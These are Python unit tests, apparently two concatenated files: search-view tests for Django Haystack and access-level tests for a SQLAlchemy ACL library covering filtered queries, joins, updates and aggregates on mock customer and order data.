def test_invalid_page(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': '165233'})
self.assertEqual(response.status_code, 404)
def test_empty_results(self):
sv = SearchView()
sv.request = HttpRequest()
sv.form = sv.build_form()
self.assertTrue(isinstance(sv.get_results(), EmptySearchQuerySet))
def test_initial_data(self):
sv = SearchView(form_class=InitialedSearchForm)
sv.request = HttpRequest()
form = sv.build_form()
self.assertTrue(isinstance(form, InitialedSearchForm))
self.assertEqual(form.fields['q'].initial, 'Search for...')
para = form.as_p()
self.assertTrue(u'<label for="id_q">Search:</label>' in para)
self.assertTrue(u'value="Search for..."' in para)
def test_pagination(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 0})
self.assertEqual(response.status_code, 404)
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 2})
self.assertEqual(response.status_code, 404)
def test_thread_safety(self):
exceptions = []
def threaded_view(resp_queue, view, request):
time.sleep(2)
try:
view(request)
resp_queue.put(request.GET['name'])
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchView(SearchView):
def __call__(self, request):
print("Name: %s" % request.GET['name'])
return super(ThreadedSearchView, self).__call__(request)
view = search_view_factory(view_class=ThreadedSearchView)
resp_queue = queue.Queue()
request_1 = HttpRequest()
request_1.GET = {'name': 'foo'}
request_2 = HttpRequest()
request_2.GET = {'name': 'bar'}
th1 = Thread(target=threaded_view, args=(resp_queue, view, request_1))
th2 = Thread(target=threaded_view, args=(resp_queue, view, request_2))
th1.start()
th2.start()
th1.join()
th2.join()
foo = resp_queue.get()
bar = resp_queue.get()
self.assertNotEqual(foo, bar)
def test_spelling(self):
# Stow.
from django.conf import settings
old = settings.HAYSTACK_CONNECTIONS['default'].get('INCLUDE_SPELLING', None)
settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING'] = True
sv = SearchView()
sv.query = 'Nothing'
sv.results = []
sv.build_page = lambda: (None, None)
sv.create_response()
context = sv.get_context()
self.assertIn('suggestion', context,
msg='Spelling suggestions should be present even if'
' no results were returned')
self.assertEqual(context['suggestion'], None)
# Restore
settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING'] = old
if old is None:
del settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING']
@override_settings(ROOT_URLCONF='test_haystack.results_per_page_urls')
class ResultsPerPageTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(ResultsPerPageTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(ResultsPerPageTestCase, self).tearDown()
def test_custom_results_per_page(self):
response = self.client.get('/search/', {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 1)
self.assertEqual(response.context[-1]['paginator'].per_page, 1)
response = self.client.get('/search2/', {'q': 'hello world'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 2)
self.assertEqual(response.context[-1]['paginator'].per_page, 2)
class FacetedSearchViewTestCase(TestCase):
def setUp(self):
super(FacetedSearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(FacetedSearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_faceted_search'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['facets'], {})
def test_empty_results(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.get_results(), EmptySearchQuerySet))
def test_default_form(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.form, FacetedSearchForm))
def test_list_selected_facets(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [])
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('selected_facets=author:daniel&selected_facets=author:chris')
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [u'author:daniel', u'author:chris'])
class BasicSearchViewTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(BasicSearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(BasicSearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_basic_search'))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse('haystack_basic_search'), {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response.context[-1]['form']), ModelSearchForm)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
self.assertEqual(response.context[-1]['page'].object_list[0].content_type(), u'core.mockmodel')
self.assertEqual(response.context[-1]['page'].object_list[0].pk, '1')
self.assertEqual(response.context[-1]['query'], u'haystack')
def test_invalid_page(self):
response = self.client.get(reverse('haystack_basic_search'), {'q': 'haystack', 'page': '165233'})
self.assertEqual(response.status_code, 404)
|
unit_tests.py
|
import sys, unittest
sys.path.insert(0,'../..')
sys.path.insert(1,'..')
from legacy_test.setup import DefaultSetupMixin, ParseYAMLSetupMixin, PostgresSetupMixin
from legacy_test.models import ExemplaryModel, CustomersModel, OrdersModel, ArticlesModel
from sqlalchemy_acl import ACL
from sqlalchemy import func
from random import randrange
class StandardQueriesTestCase(ParseYAMLSetupMixin, unittest.TestCase):
def test_get_users(self):
# print(ACL.AccessLevels.get())
# get all available users, for this setup case
users = ACL.Users.get()
self.assertIsInstance(users, list)
self.assertTrue(users)
[self.assertIsInstance(user, ACL.UserModel) for user in users]
def test_add_users(self):
ex_user = ACL.UserModel(username='example_user')
ACL.Users.add([ex_user])
self.assertEqual(ACL.Users.get(username='example_user'), ex_user)
def test_get_objects(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
# user at one of lowest access-levels
some_user = ACL.Users.get(username='tradsjun1')
other_level_objects = [
ExemplaryModel(id=5, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=6, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=7, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=8, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=9, string_field='some_string', integer_field=randrange(100000)),
]
ACL.set_user(some_user)
self.session.add_all(other_level_objects)
self.session.commit()
ACL.unset_user()
# set admin user
ACL.set_user(ACL.Users.get(username='chair2'))
# check if all added entries are accessible for admin (root access-level user)
self.assertEqual(self.session.query(ExemplaryModel).all(), root_level_objects + other_level_objects)
ACL.unset_user()
# set exemplary user
ACL.set_user(some_user)
# check if entries added by exemplary user are accessible for him
self.assertEqual(self.session.query(ExemplaryModel).all(), other_level_objects)
ACL.unset_user()
# set other exemplary user at same access-level
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(ExemplaryModel).all(), other_level_objects)
ACL.unset_user()
# set other exemplary user at different access-level
ACL.set_user(ACL.Users.get(username='accountint'))
# this user shouldn't have access to any entries
self.assertEqual(self.session.query(ExemplaryModel).all(), [])
self.assertNotEqual(self.session.query(ExemplaryModel), other_level_objects)
ACL.unset_user()
def test_delete_object_with_select(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
# get first object (object with id = 1)
object = self.session.query(ExemplaryModel).get(1)
# delete object and commit changes to database
self.session.delete(object)
self.session.commit()
# create set corresponding to initial list without first object
after_deletion = set(root_level_objects) - {object}
# assert with select query result
self.assertEqual(after_deletion, set(self.session.query(ExemplaryModel).all()))
ACL.unset_user()
def test_delete_object_without_select(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
# delete object with id = 1
self.session.query(ExemplaryModel).filter_by(id=1).delete()
self.session.commit()
after_deletion = self.session.query(ExemplaryModel).filter(ExemplaryModel.id.in_([2,3,4]))
self.assertEqual(set(after_deletion), set(self.session.query(ExemplaryModel).all()))
ACL.unset_user()
# DELETE, użytkownik wyżej usuwa rekordy stworzone przez użytkownika niżej
def test_authorized_delete(self):
ACL.set_user(ACL.Users.get(username='tradsjun2'))
low_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(low_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
object = self.session.query(ExemplaryModel).first()
self.session.delete(object)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
self.assertEqual(self.session.query(ExemplaryModel).all(), low_level_objects[1:])
ACL.unset_user()
# WHERE
def test_filter(self):
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
low_level_objects = [
ExemplaryModel(id=5, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=6, string_field='some_string', integer_field=randrange(100000))
]
self.session.add_all(low_level_objects)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(ExemplaryModel).filter(ExemplaryModel.id > 2).all(), low_level_objects)
ACL.unset_user()
# JOIN na tabelach stworzonych przez użytkowników na tym samym poziomie
def test_same_lvl_join(self):
ACL.set_user(ACL.Users.get(username='chair1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='chair2'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # dla zmyły
]
self.session.add_all(orders)
self.session.commit()
join = [(customers[0], orders[0]), (customers[0], orders[1]), (customers[1], orders[2]), (customers[1], orders[3])]
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='chair1'))
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
# JOIN z tabelą stworzoną przez użytkownika niżej
def test_low_lvl_join(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # dla zmyły
]
self.session.add_all(orders)
self.session.commit()
ACL.set_user(ACL.Users.get(username='account'))
join = [(customers[0], orders[0]), (customers[0], orders[1]), (customers[1], orders[2]), (customers[1], orders[3])]
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
# JOIN z tabelą stworzoną przez użytkownika wyżej
def test_high_lvl_join(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # dla zmyły
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.name,
OrdersModel.id, OrdersModel.order_date).join(OrdersModel).all()
self.assertEqual(result, [])
ACL.unset_user()
# JOIN z tabelą stworzoną przez użytkownika wyżej, ale z dodanymi rekordami przez użytkownika niżej
def test_high_lvl_join(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
client = CustomersModel(id=3, name='James Bond', phone_number='007')
self.session.add(client)
self.session.commit()
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, [(client, orders[4])])
ACL.unset_user()
# UPDATE na rekordzie o wyższym poziomie
def test_high_lvl_update(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
ACL.set_user(ACL.Users.get(username='account'))
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# UPDATE na rekordzie o niższym poziomie
def test_low_lvl_update(self):
ACL.set_user(ACL.Users.get(username='accountjun'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# UPDATE na rekordzie o tym samym poziomie, stworzonym przez innego użytkownika
def test_same_lvl_update(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# COUNT na rekordach o wyższym poziomie
def test_high_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='accountint'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountint'))
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 2)
ACL.unset_user()
# COUNT na rekordach o niższym poziomie
def test_low_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='accountint'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 5)
ACL.unset_user()
# COUNT na rekordach o tym samym poziomie
def test_same_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 5)
ACL.unset_user()
# GROUP BY na rekordach na wyższym poziomie
def test_high_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).group_by(CustomersModel.id).all()
self.assertEqual(result, [])
ACL.unset_user()
# GROUP BY na rekordach na niższym poziomie
def test_low_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='accountjun'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)) \
.join(OrdersModel, CustomersModel.id == OrdersModel.customer_id) \
.group_by(CustomersModel.id).all()
self.assertEqual(result, [(1, 2), (2, 3)])
ACL.unset_user()
# GROUP By na rekordach na tym samym poziomie
def test_same_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).group_by(CustomersModel.id).all()
self.assertEqual(result, [(1, 2), (2, 3)])
ACL.unset_user()
# SUBQUERY w JOIN, wyższy powinien widzieć późniejsze daty dodane przez niższego
def test_low_lvl_subquery(self):
ACL.set_user(ACL.Users.get(username='trads'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=5, customer_id=1, order_date='10-31-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
subquery = self.session.query(OrdersModel.customer_id, func.max(OrdersModel.order_date).label('latest_order')
).group_by(OrdersModel.customer_id).subquery()
query = self.session.query(CustomersModel.name, subquery.c.latest_order).join(subquery,
CustomersModel.id == subquery.c.customer_id).all()
self.assertEqual(query, [('Will Smith', '10-31-1998'), ('Tom Hanks', '10-15-1998')])
ACL.unset_user()
# SUBQUERY w JOIN, użytkownik powinien widzieć późniejsze zamówienia
def test_same_lvl_subquery(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=5, customer_id=1, order_date='10-31-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
subquery = self.session.query(OrdersModel.customer_id, func.max(OrdersModel.order_date).label('latest_order')
).group_by(OrdersModel.customer_id).subquery()
query = self.session.query(CustomersModel.name, subquery.c.latest_order).join(subquery,
CustomersModel.id == subquery.c.customer_id).all()
self.assertEqual(query, [('Will Smith', '10-31-1998'), ('Tom Hanks', '10-15-1998')])
ACL.unset_user()
# HAVING, gdzie użytkownikowi się nie udaje, bo nie ma dostępu do tego klienta
# (pytamy o id klientów, którzy mają więcej niż 2 zamówienia)
def test_high_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [])
ACL.unset_user()
# HAVING, gdzie użytkownikowi się udaje, bo ma wyższy poziom dostępu
# (pytamy o id klientów, którzy mają więcej niż 2 zamówienia)
def test_low_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [(2, 4)])
ACL.unset_user()
# HAVING, gdzie użytkownikowi się udaje, bo ma ten sam poziom dostępu
# (pytamy o id klientów, którzy mają więcej niż 2 zamówienia)
def test_same_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [(2, 4)])
ACL.unset_user()
# podwójny JOIN - sprawdzamy średnią liczbę zamówionych pudełek przez danego klienta
def test_join2(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
orders = [
OrdersModel(id=1, customer_id=1, order_date='2021-01-01'),
OrdersModel(id=2, customer_id=2, order_date='2021-01-01'),
OrdersModel(id=3, customer_id=1, order_date='2021-01-01')
]
articles = [
ArticlesModel(id=1, order_id=1, box_id=1, quantity=10),
ArticlesModel(id=2, order_id=1, box_id=4, quantity=5),
ArticlesModel(id=3, order_id=2, box_id=2, quantity=20),
ArticlesModel(id=4, order_id=3, box_id=2, quantity=12),
]
self.session.add_all(customers)
self.session.commit()
self.session.add_all(orders)
self.session.commit()
self.session.add_all(articles)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
customers = [
CustomersModel(id=3, name='Mel Gibson', phone_number='444-555-666')
]
orders = [
OrdersModel(id=4, customer_id=3, order_date='2021-01-01'),
OrdersModel(id=5, customer_id=3, order_date='2021-01-01'),
